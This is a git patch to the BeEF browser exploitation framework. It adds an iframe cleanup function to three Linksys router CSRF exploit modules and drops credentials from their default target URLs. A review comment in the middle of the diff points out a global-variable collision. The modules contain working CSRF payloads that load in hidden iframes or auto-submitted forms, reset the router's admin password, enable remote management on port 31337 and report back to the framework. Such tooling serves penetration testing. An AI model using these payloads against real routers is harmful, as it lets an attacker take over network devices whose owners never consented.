From 5c678a2550c0fa64f0d94038f6272de84e7ee760 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Sat, 3 Mar 2012 20:43:56 +1030
Subject: [PATCH] Added cleanup() function to router exploits
Removed `username:password@` portion of example target URLs as unfortunately this triggers warnings in most modern browsers. The modules target CSRF vulnerabilities and it's expected and acceptable behaviour to rely on the user having an authorized session by default. "Advanced users" will be familiar with the `username:password@` trick and can add it to the URL if they desire.
---
 modules/router/linksys_befsr41_csrf/command.js | 12 ++++++++++--
 modules/router/linksys_befsr41_csrf/module.rb | 2 +-
 modules/router/linksys_wrt54g2_csrf/command.js | 11 +++++++++--
 modules/router/linksys_wrt54g2_csrf/module.rb | 2 +-
 modules/router/linksys_wrt54g_csrf/command.js | 11 +++++++++--
 modules/router/linksys_wrt54g_csrf/module.rb | 2 +-
 6 files changed, 31 insertions(+), 9 deletions(-)
diff --git a/modules/router/linksys_befsr41_csrf/command.js b/modules/router/linksys_befsr41_csrf/command.js
index dca74aa47..cb7d19eb5 100644
--- a/modules/router/linksys_befsr41_csrf/command.js
+++ b/modules/router/linksys_befsr41_csrf/command.js
@@ -14,7 +14,15 @@
 // limitations under the License.
 //
 beef.execute(function() {
- var iframe = beef.dom.createInvisibleIframe();
- iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+
+ var befsr41_iframe = beef.dom.createInvisibleIframe();
+ befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(befsr41_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_befsr41_csrf/module.rb b/modules/router/linksys_befsr41_csrf/module.rb
index 0d0684ac5..40dcaa4dc 100644
--- a/modules/router/linksys_befsr41_csrf/module.rb
+++ b/modules/router/linksys_befsr41_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_befsr41_csrf < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
 {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
 {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
 ]
diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js
index f98992afb..036a25aab 100644
--- a/modules/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/router/linksys_wrt54g2_csrf/command.js
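Review bot: The added `cleanup = function() {…}` in modules/router/linksys_befsr41_csrf/command.js assigns an undeclared identifier, so it becomes a page-wide global, and `setTimeout("cleanup()", 15000)` evaluates a string in global scope to reach it. The -100,8 hunks of linksys_wrt54g2_csrf/command.js and linksys_wrt54g_csrf/command.js use the same global name, so if two of these modules ran in one page within 15 seconds the later assignment would replace the earlier handler; one iframe would then never be removed and the second `removeChild` call would throw on an already detached node. Passing a closure avoids both the global and the string evaluation: `setTimeout(function() { document.body.removeChild(befsr41_iframe); }, 15000);`. A one-line comment stating why the delay is 15000 ms would also help the next reader.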
@@ -20,7 +20,7 @@ beef.execute(function() {
 var target = gateway + "Manage.tri";
- var iframe = beef.dom.createInvisibleIframe();
+ var wrt54g2_iframe = beef.dom.createInvisibleIframe();
 var form = document.createElement('form');
 form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
 input.setAttribute('value', 'en');
 form.appendChild(input);
- iframe.contentWindow.document.body.appendChild(form);
+ wrt54g2_iframe.contentWindow.document.body.appendChild(form);
 form.submit();
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(wrt54g2_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_wrt54g2_csrf/module.rb b/modules/router/linksys_wrt54g2_csrf/module.rb
index 7f0325e7d..94f5d6ed0 100644
--- a/modules/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/router/linksys_wrt54g2_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g2_csrf < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
 {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
 {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
 ]
diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js
index 55a5bf747..456922d35 100644
--- a/modules/router/linksys_wrt54g_csrf/command.js
+++ b/modules/router/linksys_wrt54g_csrf/command.js
@@ -20,7 +20,7 @@ beef.execute(function() {
 var target = gateway + "manage.tri";
- var iframe = beef.dom.createInvisibleIframe();
+ var wrt54g_iframe = beef.dom.createInvisibleIframe();
 var form = document.createElement('form');
 form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
 input.setAttribute('value', 'en');
 form.appendChild(input);
- iframe.contentWindow.document.body.appendChild(form);
+ wrt54g_iframe.contentWindow.document.body.appendChild(form);
 form.submit();
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(wrt54g_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
 });
+
diff --git a/modules/router/linksys_wrt54g_csrf/module.rb b/modules/router/linksys_wrt54g_csrf/module.rb
index 2d1b45f2c..47ee87039 100644
--- a/modules/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/router/linksys_wrt54g_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g_csrf < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
 {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
 {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
 ]